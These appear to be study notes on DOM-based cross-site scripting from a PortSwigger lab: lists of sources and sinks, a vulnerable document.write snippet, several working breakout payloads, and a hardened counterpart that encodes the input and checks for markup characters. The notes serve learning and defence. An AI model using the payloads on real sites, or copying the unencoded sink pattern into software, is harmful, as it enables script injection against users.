https://portswigger.net/web-security/cross-site-scripting/cheat-sheet

Common sources (attacker-controllable inputs that can reach a sink):

document.URL
document.documentURI
document.URLUnencoded
document.baseURI
location
document.cookie
document.referrer
window.name
history.pushState
history.replaceState
localStorage
sessionStorage
IndexedDB (mozIndexedDB, webkitIndexedDB, msIndexedDB)
Database

The following are some of the main sinks that can lead to DOM-XSS vulnerabilities:

document.write()
document.writeln()
document.domain
element.innerHTML
element.outerHTML
element.insertAdjacentHTML
element.onevent

The following jQuery functions are also sinks that can lead to DOM-XSS vulnerabilities:

add()
after()
append()
animate()
insertAfter()
insertBefore()
before()
html()
prepend()
replaceAll()
replaceWith()
wrap()
wrapInner()
wrapAll()
has()
constructor()
init()
index()
jQuery.parseHTML()
$.parseHTML()

DOM XSS in document.write sink using source location.search

Our input is placed inside an img src attribute. Here is the vulnerable code context:

<script>
    // Sink: the query is concatenated into an attribute with no encoding,
    // so a double quote in the input closes src="..." and the rest is parsed as HTML.
    function trackSearch(query) {
        document.write('<img src="/resources/images/tracker.gif?searchTerms='+query+'">');
    }
    // Source: the search parameter is read straight from location.search
    var query = (new URLSearchParams(window.location.search)).get('search');
    if(query) {
        trackSearch(query);
    }
</script>


"><svg onload=alert(1)>
"><img src=1 onerror=alert()> --> triggers an alert but does not validate the lab
"><script>alert()</script>
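Defender-side counterpart to the lab snippet, added here as an example (this is not PortSwigger's lab code, and the function names are my own): the unsafe concatenation is reproduced so a parser-style check can show where the src attribute actually ends, beside a hardened version that encodes the parameter with URLSearchParams and assigns img.src through the DOM instead of document.write.

```javascript
// Added example: the document.write sink from the lab beside a hardened equivalent.
// String building is kept separate from DOM insertion so it runs under Node.

// 1. Faithful copy of how the vulnerable trackSearch() builds its markup:
//    the query lands inside src="..." with no encoding at all.
function unsafeTrackerMarkup(query) {
  return '<img src="/resources/images/tracker.gif?searchTerms=' + query + '">';
}

// 2. Where the HTML parser will terminate the src attribute: at the first
//    double quote. Whatever follows is parsed as further markup, which is
//    exactly what the "><svg onload=...> payload relies on.
function parsedSrc(markup) {
  const m = /src="([^"]*)"/.exec(markup);
  return m ? m[1] : null;
}

// 3. Hardened variant. URLSearchParams percent-encodes " < > ( ) = and friends,
//    so no input can leave the query string, and the URL is assigned as a
//    property rather than being parsed as HTML.
function safeTrackerUrl(query) {
  const params = new URLSearchParams({ searchTerms: query });
  return '/resources/images/tracker.gif?' + params.toString();
}

function trackSearchSafe(query) {
  const url = safeTrackerUrl(query);
  if (typeof document !== 'undefined') {          // browser only
    const img = document.createElement('img');
    img.src = url;                                // no HTML parsing of user input
    document.body.appendChild(img);
  }
  return url;
}

// 4. Quick review check: does a value still contain characters that could
//    close an attribute or open a tag?
function hasMarkupChars(value) {
  return /["<>]/.test(value);
}

// Constructed sample input: the breakout payload recorded in the notes above.
const SAMPLE = '"><svg onload=alert(1)>';
```

Run under Node to compare parsedSrc(unsafeTrackerMarkup(SAMPLE)) with safeTrackerUrl(SAMPLE): the former is truncated at the injected quote, the latter carries the whole payload as inert query data.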

DOM XSS in document.write sink using source location.search inside a select element

The JavaScript extracts a storeId parameter from the location.search source. It then uses document.write to create a new option in the select element for the stock checker functionality.